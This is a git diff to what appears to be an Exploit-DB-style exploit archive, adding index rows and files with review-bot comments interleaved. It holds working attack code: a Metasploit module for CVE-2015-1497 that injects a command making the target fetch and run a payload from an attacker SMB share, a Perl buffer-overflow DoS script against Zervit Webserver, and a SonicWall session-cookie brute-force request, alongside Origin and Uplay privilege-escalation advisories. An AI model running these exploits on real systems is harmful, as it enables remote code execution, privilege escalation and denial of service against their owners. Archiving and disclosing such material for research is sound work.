diff --git a/files.csv b/files.csv
index 5d5bc5af5..dd72e571e 100755
--- a/files.csv
+++ b/files.csv
@@ -143,7 +143,7 @@ id,file,description,date,author,platform,type,port
 147,platforms/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow Exploit",2004-01-23,"Luigi Auriemma",windows,dos,0
 148,platforms/windows/dos/148.sh,"Microsoft Windows 2003/XP - Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0
 149,platforms/windows/remote/149.c,"Serv-U FTPD 3.x/4.x ""SITE CHMOD"" Command Remote Exploit",2004-01-27,lion,windows,remote,21
-151,platforms/windows/remote/151.txt,"Microsoft Internet Explorer URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0
+151,platforms/windows/remote/151.txt,"Microsoft Internet Explorer - URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0
 152,platforms/linux/local/152.c,"rsync <= 2.5.7 - Local Stack Overflow Root Exploit",2004-02-13,"Abhisek Datta",linux,local,0
 153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 LSASS.EXE Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0
 154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - ""mremap()"" Local Proof-of-Concept (2)",2004-02-18,"Christophe Devine",linux,local,0
@@ -8222,7 +8222,7 @@ id,file,description,date,author,platform,type,port
 8718,platforms/php/webapps/8718.txt,"douran portal <= 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0
 8719,platforms/asp/webapps/8719.py,"Dana Portal Remote Change Admin Password Exploit",2009-05-18,Abysssec,asp,webapps,0
 8720,platforms/multiple/dos/8720.c,"OpenSSL <= 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion DoS",2009-05-18,"Jon Oberheide",multiple,dos,0
-8721,platforms/windows/dos/8721.pl,"Zervit Webserver 0.04 (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0
+8721,platforms/windows/dos/8721.pl,"Zervit Webserver 0.04 - (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0
 8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 (Get Request) Remote Denial of Service Exploit",2009-05-18,Stack,windows,dos,0
 8724,platforms/php/webapps/8724.txt,"LightOpenCMS 0.1 (id) Remote SQL Injection Vulnerability",2009-05-18,Mi4night,php,webapps,0
 8725,platforms/php/webapps/8725.php,"Jieqi CMS <= 1.5 - Remote Code Execution Exploit",2009-05-18,Securitylab.ir,php,webapps,0
@@ -32618,6 +32618,8 @@ id,file,description,date,author,platform,type,port
 36185,platforms/php/webapps/36185.txt,"WordPress Pixiv Custom Theme 2.1.5 'cpage' Parameter Cross Site Scripting Vulnerability",2011-09-29,SiteWatch,php,webapps,0
 36186,platforms/php/webapps/36186.txt,"WordPress Morning Coffee Theme 3.5 'index.php' Cross Site Scripting Vulnerability",2011-09-30,SiteWatch,php,webapps,0
 36187,platforms/php/webapps/36187.txt,"WordPress Black-LetterHead Theme 1.5 'index.php' Cross Site Scripting Vulnerability",2011-09-30,SiteWatch,php,webapps,0
+36188,platforms/windows/local/36188.txt,"Electronic Arts Origin Client 9.5.5 - Multiple Privilege Escalation Vulnerabilities",2015-02-26,LiquidWorm,windows,local,0
+36189,platforms/windows/local/36189.txt,"Ubisoft Uplay 5.0 - Insecure File Permissions Local Privilege Escalation",2015-02-26,LiquidWorm,windows,local,0
 36191,platforms/php/webapps/36191.txt,"WordPress RedLine Theme 1.65 's' Parameter Cross Site Scripting Vulnerability",2011-09-30,SiteWatch,php,webapps,0
 36192,platforms/php/webapps/36192.txt,"A2CMS 'index.php' Local File Disclosure Vulnerability",2011-09-28,St493r,php,webapps,0
 36193,platforms/php/webapps/36193.txt,"WordPress WP Bannerize 2.8.7 'ajax_sorter.php' SQL Injection Vulnerability",2011-09-30,"Miroslav Stampar",php,webapps,0
@@ -32631,3 +32633,5 @@ id,file,description,date,author,platform,type,port
 36201,platforms/php/webapps/36201.txt,"Phorum 5.2.18 'admin/index.php' Cross-Site Scripting Vulnerability",2011-10-03,"Stefan Schurtz",php,webapps,0
 36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 index.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
 36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 phprint.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
+36205,platforms/hardware/remote/36205.txt,"SonicWALL SessId Cookie Brute-force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0
+36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
diff --git a/platforms/hardware/remote/36205.txt b/platforms/hardware/remote/36205.txt
new file mode 100755
index 000000000..540945ed9
--- /dev/null
+++ b/platforms/hardware/remote/36205.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/49930/info
+
+SonicWall NSA 4500 is prone to an HTML-injection vulnerability and a session-hijacking vulnerability.
+
+Exploiting these issues can allow an attacker to hijack a user's session and gain unauthorized access to the affected application, or run malicious HTML or JavaScript code, potentially allowing the attacker to steal cookie-based authentication credentials, and control how the site is rendered to the user; other attacks are also possible.
+
+GET /log.wri HTTP/1.0
+Host: 123.123.123.123
+Connection: close
+User-Agent: brute-forcing
+Cookie: SessId=111111111
\ No newline at end of file
diff --git a/platforms/windows/dos/8721.pl b/platforms/windows/dos/8721.pl
index fdde27564..d06cc2580 100755
--- a/platforms/windows/dos/8721.pl
+++ b/platforms/windows/dos/8721.pl
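Review bot: The new 36205.txt gives no affected firmware version, fix, or vendor reference beyond the BID link on its first line, and nothing in it supports the "Brute-force Weakness" named in the new files.csv title — the text never states how `SessId` is generated or how large its value space is, so the single request ending in `Cookie: SessId=111111111` reads as an illustration rather than evidence. The BID summary in the file also describes an HTML-injection issue that the index title omits. A line next to the source URL such as `Affected: SonicWall NSA 4500 (firmware version not stated in BID 49930); Fix: see vendor advisory` — filled in with the real values if they are known — would let a reader triage without following the link, and `Host: 123.123.123.123` should be marked as a placeholder address.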
@@ -1,23 +1,23 @@
-#!/usr/bin/perl
-# Zervit webserver 0.4 Bof Poc
-# make it just for fun :s
-use LWP::Simple;
-use LWP::UserAgent;
-
-if (@ARGV < 2) {
- print("Usage: $0 \n");
- print("TARGETS are\n ");
- print("Example: perl $0 127.0.0.1 777 \n");
- exit(1);
- }
- ($target, $port) = @ARGV;
- print("Zervit Webserver 0.04 bof xpl : Coded by Stack!\n");
- print("Attacking $target on port $port!\n");
- print("Ddossing .......\n");
- $dos ="\x41" x 1000 ;
- $temp="/" x 2;
- my $url= "http://". $target. ":" . $port .$temp . $dos;
- $content=get $url;
- print("\n Server Bofed");
-
-# milw0rm.com [2009-05-18]
+#!/usr/bin/perl
+# Zervit webserver 0.4 Bof Poc
+# make it just for fun :s
+use LWP::Simple;
+use LWP::UserAgent;
+
+if (@ARGV < 2) {
+ print("Usage: $0 \n");
+ print("TARGETS are\n ");
+ print("Example: perl $0 127.0.0.1 777 \n");
+ exit(1);
+ }
+ ($target, $port) = @ARGV;
+ print("Zervit Webserver 0.04 bof xpl : Coded by Stack!\n");
+ print("Attacking $target on port $port!\n");
+ print("Ddossing .......\n");
+ $dos ="\x41" x 1000 ;
+ $temp="/" x 2;
+ my $url= "http://". $target. ":" . $port .$temp . $dos;
+ $content=get $url;
+ print("\n Server Bofed");
+
+# milw0rm.com [2009-05-18]
diff --git a/platforms/windows/local/36188.txt b/platforms/windows/local/36188.txt
new file mode 100755
index 000000000..fcdf03f0f
--- /dev/null
+++ b/platforms/windows/local/36188.txt
@@ -0,0 +1,240 @@
+?Electronic Arts Origin Client 9.5.5 Multiple Privilege Escalation Vulnerabilities
+
+Vendor: Electronic Arts Inc.
+Product web page: https://www.origin.com
+Affected version: 9.5.5.2850 (353317)
+ 9.5.3.636 (350385)
+ 9.5.2.2829 (348065)
+
+Summary: Origin (formerly EA Download Manager (EADM)) is digital distribution
+software from Electronic Arts that allows users to purchase games on the internet
+for PC and mobile platforms, and download them with the Origin client (formerly
+EA Download Manager, EA Downloader and EA Link).
+
+Desc#1: The application is vulnerable to an elevation of privileges vulnerability
+which can be used by a simple user that can change the executable file with a
+binary of choice. The vulnerability exist due to the improper permissions,
+with the 'F' flag (full) for the 'Everyone' and 'Users' group, for the
+'OriginClientService.exe' binary file, and for all the files in the 'Origin'
+directory. The service is installed by default to start on system boot with
+LocalSystem privileges. Attackers can replace the binary with their rootkit,
+and on reboot they get SYSTEM privileges.
+
+Desc#2: Origin client service also suffers from an unquoted search path issue
+impacting the 'Origin Client Service' service for Windows deployed as part of
+the Origin Thin Setup bundle. This could potentially allow an authorized but
+non-privileged local user to execute arbitrary code with elevated privileges
+on the system. A successful attempt would require the local user to be able to
+insert their code in the system root path undetected by the OS or other security
+applications where it could potentially be executed during application startup
+or reboot. If successful, the local user’s code would execute with the elevated
+privileges of the application.
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+ Microsoft Windows 7 Ultimate SP1 (EN)
+
+
+Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2015-5231
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5231.php
+
+
+14.12.2014
+
+
+
+**************************************************************************
+C:\>sc qc "Origin Client Service"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Origin Client Service
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 3 DEMAND_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\Origin\OriginClientService.exe <-----< Unquoted path
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Origin Client Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\>cacls "C:\Program Files (x86)\Origin\OriginClientService.exe"
+c:\Program Files (x86)\Origin\OriginClientService.exe Everyone:(ID)F <-----< Full control
+ BUILTIN\Users:(ID)F <-----< Full control
+ NT AUTHORITY\SYSTEM:(ID)F
+ BUILTIN\Administrators:(ID)F
+
+
+C:\>
+**************************************************************************
+
+**************************************************************************
+C:\>cscript XCACLS.vbs "C:\Program Files (x86)\Origin\*.exe"
+Microsoft (R) Windows Script Host Version 5.8
+Copyright (C) Microsoft Corporation. All rights reserved.
+
+Starting XCACLS.VBS (Version: 5.2) Script at 15.12.2014 19:46:41
+
+Startup directory:
+"C:\"
+
+Arguments Used:
+ Filename = "C:\Program Files (x86)\Origin\*.exe"
+
+
+
+**************************************************************************
+File: C:\Program Files (x86)\Origin\EAProxyInstaller.exe
+
+Permissions:
+Type Username Permissions Inheritance
+
+Allowed \Everyone Full Control This Folder Only
+Allowed BUILTIN\Users Full Control This Folder Only
+Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only
+Allowed BUILTIN\Administrators Full Control This Folder Only
+
+No Auditing set
+
+Owner: BUILTIN\Administrators
+**************************************************************************
+
+**************************************************************************
+File: C:\Program Files (x86)\Origin\igoproxy64.exe
+
+Permissions:
+Type Username Permissions Inheritance
+
+Allowed \Everyone Full Control This Folder Only
+Allowed BUILTIN\Users Full Control This Folder Only
+Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only
+Allowed BUILTIN\Administrators Full Control This Folder Only
+
+No Auditing set
+
+Owner: BUILTIN\Administrators
+**************************************************************************
+
+**************************************************************************
+File: C:\Program Files (x86)\Origin\Origin.exe
+
+Permissions:
+Type Username Permissions Inheritance
+
+Allowed \Everyone Full Control This Folder Only
+Allowed BUILTIN\Users Full Control This Folder Only
+Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only
+Allowed BUILTIN\Administrators Full Control This Folder Only
+
+No Auditing set
+
+Owner: BUILTIN\Administrators
+**************************************************************************
+
+**************************************************************************
+File: C:\Program Files (x86)\Origin\OriginClientService.exe
+
+Permissions:
+Type Username Permissions Inheritance
+
+Allowed \Everyone Full Control This Folder Only
+Allowed BUILTIN\Users Full Control This Folder Only
+Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only
+Allowed BUILTIN\Administrators Full Control This Folder Only
+
+No Auditing set
+
+Owner: BUILTIN\Administrators
+**************************************************************************
+
+**************************************************************************
+File: C:\Program Files (x86)\Origin\OriginCrashReporter.exe
+
+Permissions:
+Type Username Permissions Inheritance
+
+Allowed \Everyone Full Control This Folder Only
+Allowed BUILTIN\Users Full Control This Folder Only
+Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only
+Allowed BUILTIN\Administrators Full Control This Folder Only
+
+No Auditing set
+
+Owner: BUILTIN\Administrators
+**************************************************************************
+
+**************************************************************************
+File: C:\Program Files (x86)\Origin\OriginER.exe
+
+Permissions:
+Type Username Permissions Inheritance
+
+Allowed \Everyone Full Control This Folder Only
+Allowed BUILTIN\Users Full Control This Folder Only
+Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only
+Allowed BUILTIN\Administrators Full Control This Folder Only
+
+No Auditing set
+
+Owner: BUILTIN\Administrators
+**************************************************************************
+
+**************************************************************************
+File: C:\Program Files (x86)\Origin\OriginUninstall.exe
+
+Permissions:
+Type Username Permissions Inheritance
+
+Allowed \Everyone Full Control This Folder Only
+Allowed BUILTIN\Users Full Control This Folder Only
+Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only
+Allowed BUILTIN\Administrators Full Control This Folder Only
+
+No Auditing set
+
+Owner: BUILTIN\Administrators
+**************************************************************************
+
+
+Operation Complete
+Elapsed Time: 0,1796875 seconds.
+
+Ending Script at 15.12.2014 19:46:41
+
+
+
+C:\>
+**************************************************************************
+
+--
+
+**************************************************************************
+Changed permissions and service binary path name (vendor fix):
+--------------------------------------------------------------
+
+C:\>sc qc "Origin Client Service"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Origin Client Service
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 3 DEMAND_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : "C:\Program Files (x86)\Origin\OriginClientService.exe" <-----< Quoted path
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Origin Client Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\>icacls "C:\Program Files (x86)\Origin\OriginClientService.exe"
+C:\Program Files (x86)\Origin\OriginClientService.exe NT AUTHORITY\SYSTEM:(I)(F)
+ BUILTIN\Administrators:(I)(F)
+ BUILTIN\Users:(I)(RX) <-----< Read and execute
+
+Successfully processed 1 files; Failed processing 0 files
+
+C:\>
+**************************************************************************
diff --git a/platforms/windows/local/36189.txt b/platforms/windows/local/36189.txt
new file mode 100755
index 000000000..db5240ac2
--- /dev/null
+++ b/platforms/windows/local/36189.txt
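Review bot: The first line of 36188.txt begins with a stray `?` before `Electronic Arts Origin Client 9.5.5 …`; it is most likely a mis-decoded UTF-8 byte-order mark, and the same artifact opens 36189.txt (`?` alone on its first line), so both files should be re-saved without it. It is also worth spelling out for readers who have to remediate: as I read the `cacls` output, the `(ID)` suffix on `Everyone:(ID)F` and `BUILTIN\Users:(ID)F` marks inherited entries, which agrees with Desc#1's statement that every file in the `Origin` directory carries them — the directory ACL, not just `OriginClientService.exe`, is what has to be corrected. The "vendor fix" block shows the corrected ACL and the quoted `BINARY_PATH_NAME`, but no client build is named anywhere in the file as carrying that fix; a `Fixed in:` line beside `Affected version:` (with the real build number, which the file does not give) would close the loop for anyone triaging the three affected builds listed.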
@@ -0,0 +1,49 @@
+?
+Ubisoft Uplay 5.0 Insecure File Permissions Local Privilege Escalation
+
+
+Vendor: Ubisoft Entertainment S.A.
+Product web page: http://www.ubi.com
+Affected version: 5.0.0.3914 (PC)
+
+Summary: Uplay is a digital distribution, digital rights management,
+multiplayer and communications service created by Ubisoft to provide
+an experience similar to the achievements/trophies offered by various
+other game companies.
+
+ - Uplay PC is a desktop client which replaces individual game launchers
+ previously used for Ubisoft games. With Uplay PC, you have all your Uplay
+ enabled games and Uplay services in the same place and you get access to
+ a whole new set of features for your PC games.
+
+Desc: Uplay for PC suffers from an elevation of privileges vulnerability
+which can be used by a simple user that can change the executable file
+with a binary of choice. The vulnerability exist due to the improper
+permissions, with the 'F' flag (Full) for 'Users' group, making the
+entire directory 'Ubisoft Game Launcher' and its files and sub-dirs
+world-writable.
+
+Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2015-5230
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5230.php
+
+Vendor: http://forums.ubi.com/forumdisplay.php/513-Uplay
+
+
+19.02.2015
+
+--
+C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>cacls Uplay.exe
+C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\Uplay.exe BUILTIN\Users:(ID)F
+ NT AUTHORITY\SYSTEM:(ID)F
+ BUILTIN\Administrators:(ID)F
+ test-PC\yousir:(ID)F
+
+
+C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>
diff --git a/platforms/windows/remote/151.txt b/platforms/windows/remote/151.txt
index 73d09a972..f431de433 100755
--- a/platforms/windows/remote/151.txt
+++ b/platforms/windows/remote/151.txt
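Review bot: The second `Vendor:` label (`Vendor: http://forums.ubi.com/forumdisplay.php/513-Uplay`) repeats the field name used for `Vendor: Ubisoft Entertainment S.A.` but holds a forum URL, so the two collide; relabel it `Reported via:` or `Vendor contact:`. Unlike 36188.txt this advisory records no vendor response or fixed version, and the `Desc:` says the whole `Ubisoft Game Launcher` directory is world-writable while the only evidence shown is `cacls Uplay.exe` — a listing of the directory itself would support the stated scope. The `cacls` output also includes the tester's local account (`test-PC\yousir:(ID)F`), which adds nothing to the finding.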
@@ -36,6 +36,6 @@ function backbutton() { // Launch backbutton exploit on load
 if (confirm("Press OK to run backbutton exploit!")) backbutton();
-
-
-# milw0rm.com [2004-02-04]
+
+
+# milw0rm.com [2004-02-04]
diff --git a/platforms/windows/remote/36206.rb b/platforms/windows/remote/36206.rb
new file mode 100755
index 000000000..adb207aa7
--- /dev/null
+++ b/platforms/windows/remote/36206.rb
@@ -0,0 +1,151 @@
+# Exploit Title: Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability
+# Date: 2014-10-01
+# Exploit Author: Ben Turner
+# Vendor Homepage: Previosuly HP, now http://www.persistentsys.com/
+# Version: 7.9, 8.1, 9.0, 9.1
+# Tested on: Windows XP, Windows 7, Server 2003 and Server 2008
+# CVE-2015-1497
+# CVSS: 10
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ # Exploit mixins should be called first
+ include Msf::Exploit::Remote::SMB
+ include Msf::Exploit::EXE
+ include Msf::Auxiliary::Report
+
+ # Aliases for common classes
+ SIMPLE = Rex::Proto::SMB::Client
+ XCEPT = Rex::Proto::SMB::Exceptions
+ CONST = Rex::Proto::SMB::Constants
+
+
+ def initialize
+ super(
+ 'Name' => 'Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability',
+ 'Description' => %Q{
+ This module exploits PS Client Automation, by sending a remote service install and creating a callback payload.
+ },
+ 'Author' => [ 'Ben Turner' ],
+ 'License' => BSD_LICENSE,
+ 'References' =>
+ [
+ ],
+ 'Privileged' => true,
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 10,
+ 'EXITFUNC' => 'process'
+ },
+ 'Payload' => { 'BadChars' => '', 'DisableNops' => true },
+ 'Platform' => ['win'],
+ 'Targets' =>
+ [
+ [ 'PS Client Automation on Windows XP, 7, Server 2003 & 2008', {}]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'January 10 2014'
+ )
+
+ register_options([
+ OptString.new('SMBServer', [true, 'The IP address of the SMB server', '192.168.1.1']),
+ OptString.new('SMBShare', [true, 'The root directory that is shared', 'share']),
+ Opt::RPORT(3465),
+ ], self.class)
+
+ end
+
+ def exploit
+
+ createservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
+ createservice << "Nvdkit.exe service install test -path \"c:\\windows\\system32\\cmd.exe /c \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe\""
+ createservice << "\x22\x00\x00\x00"
+
+ startservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
+ startservice << "Nvdkit service start test"
+ startservice << "\x22\x00\x00\x00"
+
+ removeservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
+ removeservice << "Nvdkit service remove test"
+ removeservice << "\x22\x00\x00\x00"
+
+ def filedrop()
+ begin
+ origrport = self.datastore['RPORT']
+ self.datastore['RPORT'] = 445
+ origrhost = self.datastore['RHOST']
+ self.datastore['RHOST'] = self.datastore['SMBServer']
+ connect()
+ smb_login()
+ print_status("Generating payload, dropping here: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe'...")
+ self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
+ exe = generate_payload_exe
+ fd = smb_open("\\installservice.exe", 'rwct')
+ fd << exe
+ fd.close
+
+ self.datastore['RPORT'] = origrport
+ self.datastore['RHOST'] = origrhost
+
+ rescue Rex::Proto::SMB::Exceptions::Error => e
+ print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n")
+ abort()
+ end
+ end
+
+ def filetest()
+ begin
+ origrport = self.datastore['RPORT']
+ self.datastore['RPORT'] = 445
+ origrhost = self.datastore['RHOST']
+ self.datastore['RHOST'] = self.datastore['SMBServer']
+ connect()
+ smb_login()
+ print_status("Checking the remote share: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
+ self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
+ file = "\\installservice.exe"
+ filetest = smb_file_exist?(file)
+ if filetest
+ print_good("Found, upload was succesful! \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\#{file}\n")
+ else
+ print_error("\\\\#{datastore['SMBServer']}\\#{file} - The file does not exist, try again!")
+
+ end
+
+ self.datastore['RPORT'] = origrport
+ self.datastore['RHOST'] = origrhost
+
+ rescue Rex::Proto::SMB::Exceptions::Error => e
+ print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n")
+ abort()
+ end
+ end
+
+ begin
+ filedrop()
+ filetest()
+ connect()
+ sock.put(createservice)
+ print_status("Creating the callback payload and installing the remote service")
+ disconnect
+ sleep(5)
+ connect()
+ sock.put(startservice)
+ print_good("Exploit sent, awaiting response from service. Waiting 15 seconds before removing the service")
+ disconnect
+ sleep(30)
+ connect
+ sock.put(removeservice)
+ disconnect
+
+ rescue ::Exception => e
+ print_error("Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}\n\n")
+ abort()
+
+ end
+ end
+end
+
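Review bot: The `'References'` array in `initialize` is left empty even though the header comment names CVE-2015-1497; it should read `'References' => [ [ 'CVE', '2015-1497' ] ],` so the module is searchable by CVE. The disclosure metadata is also inconsistent three ways: the header says `# Date: 2014-10-01`, `'DisclosureDate'` says `'January 10 2014'`, and the new files.csv row dates the entry 2015-02-27 — pick one and make the others agree. In `filedrop` and `filetest` the swap of `RHOST`/`RPORT` over to the SMB server is undone only on the success path, so if `smb_login` or `smb_open` raises, the datastore is left pointing at the SMB host; moving the two restore assignments into an `ensure` clause of the existing `begin` block fixes that, and the `abort()` in each rescue — if it resolves to `Kernel#abort` — terminates the whole process rather than failing the module, where `fail_with` is the framework idiom. The `print_good` message promises a 15-second wait but the code calls `sleep(30)`.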